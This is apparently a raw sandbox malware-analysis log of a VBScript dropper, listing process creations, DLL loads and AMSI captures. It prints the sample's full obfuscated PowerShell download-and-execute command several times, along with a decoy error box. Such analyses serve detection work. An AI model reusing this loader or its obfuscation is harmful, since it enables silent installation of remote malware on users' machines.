-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^|%{[char]($_+381)})-join'') ^| ^&($BqIeP) "Jump to behavior
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Data Obfuscation

Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell").Run("cmd /C ""echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | %WinDir%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -""", 0, false) : Call MsgBox("Access denied.", 16, "Windows Explorer")IServerXMLHTTPRequest2.open("Get", "https://s4.histats.com/stats/0.php?4926118&@f16&@g1&@h1&@i1&@vhttps:/", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.open("Get", 
"https://s4.histats.com/stats/0.php?4926118&@f16&@g1&@h1&@i1&@vhttps:/", "false");IServerXMLHTTPRequest2.send();IWshShell3.Run("cmd /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $(", "0", "false")
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^|%{[char]($_+381)})-join'') ^| ^&($BqIeP) "
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^|%{[char]($_+381)})-join'') ^| ^&($BqIeP) "Jump to behavior
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
